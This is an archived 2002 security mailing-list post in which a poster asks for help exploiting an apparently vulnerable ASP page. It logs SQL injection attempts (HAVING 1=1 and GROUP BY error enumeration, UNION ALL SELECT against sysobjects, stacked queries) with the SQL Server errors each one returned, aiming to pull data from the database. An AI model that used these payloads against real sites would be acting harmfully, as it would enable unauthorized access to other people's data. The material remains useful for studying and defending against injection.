Exploitable by SQL injection???

From: SQL injector (sql_injector@yahoo.com)
Date: Sun Apr 07 2002 - 19:14:07 EDT


        Greetings everyone. It appears that I have an ASP
page that is vulnerable to direct SQL injection. Alas
I am having some difficulty exploiting it. Below you
will find my result set. My process is to enumerate
the table and column names and then query the
sysobject. My problem is that it seems that the server
first tells me a valid table name and then appears to
recant on it! After that it seems as through I am
having a UNION problem. I am not sure whether this is
due to my syntax or due to the fact that the SQL
statement may reference another table that my UNION
does not. My analysis is that the SQL statement is
exploitable but the number of tables involved make it
difficult if not impossible.

Are there other ways to enumerate the other table
names, if they exist? Is my syntax correct? Perhaps I
need to change the UNION statement? There appears to
be an ORDER BY which I?ve tried to comment out (--),
but then I get a UNION syntax error.

Where am I going wrong? In the final analysis: Is this
thing exploitable?

Also note the goal here is just to retrieve
information from the database, not bypass a logon.

-- Thanks sql_injector...

====================================================

Below you will find the process and the result after
each:

vulnerable.asp?g=1

[returns valid page]

vulnerable.asp?g=1 having 1=1?

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'Table.Name' is invalid in the select list because it
is not contained in an aggregate function and there is
no GROUP BY clause.

vulnerable.asp?g=1 group by Table.Name having 1=1--

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'Table.ID' is invalid in the select list because it is
not contained in either an aggregate function or the
GROUP BY clause.

vulnerable.asp?g=1 group by Table.Name, Table.ID
having 1=1--

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The
column prefix 'Table' does not match with a table name
or alias name used in the query.

vulnerable.asp?g=1 UNION ALL SELECT 'A',1 FROM
sysobjects

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER
BY items must appear in the select list if the
statement contains a UNION operator.

vulnerable.asp?g=1 UNION ALL SELECT
Table.Name,Table.ID FROM sysobjects

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The
column prefix 'Table' does not match with a table name
or alias name used in the query.

****Here are some very interesting URLs that perhaps
get to the heart of the matter.

vulnerable.asp?g=1;

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
Server]Incorrect syntax near the keyword 'order'.

vulnerable.asp?g=4 UNION ALL SELECT 'A',9 FROM
SysObjects WHERE 1=1 ORDER BY 1,2

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
Server]Incorrect syntax near the keyword 'order'.

vulnerable.asp?g=4 UNION ALL SELECT 'A',9 FROM
SysObjects WHERE 1=1 ORDER BY 1,2?

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
Server]Incorrect syntax near the keyword 'UNION'.

****NOTE: Another interesting URL

vulnerable.asp?g=1; SELECT name FROM sysobjects

Error Type:
Microsoft OLE DB Provider for ODBC Drivers
(0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The
column prefix 'jTab' does not match with a table name
or alias name used in the query.

__________________________________________________
Do You Yahoo!?
Yahoo! Tax Center - online filing with TurboTax
http://taxes.yahoo.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:20 EDT